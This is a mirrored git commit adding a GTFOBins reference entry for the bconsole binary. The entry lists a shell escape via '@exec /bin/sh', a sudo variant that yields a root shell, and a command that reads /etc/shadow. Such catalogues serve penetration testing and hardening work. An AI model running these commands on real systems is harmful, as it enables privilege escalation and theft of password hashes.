mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-26 12:13:13 +02:00
14
_gtfobins/bconsole.md
Normal file
14
_gtfobins/bconsole.md
Normal file
@@ -0,0 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
bconsole
|
||||
@exec /bin/sh
|
||||
sudo:
|
||||
- code: |
|
||||
sudo bconsole
|
||||
@exec /bin/sh
|
||||
file-read:
|
||||
- description: The file is actually parsed and the first wrong line is returned in an error message, thus it may not be suitable for reading arbitrary files.
|
||||
code: bconsole -c /etc/shadow
|
||||
---
|
Reference in New Issue
Block a user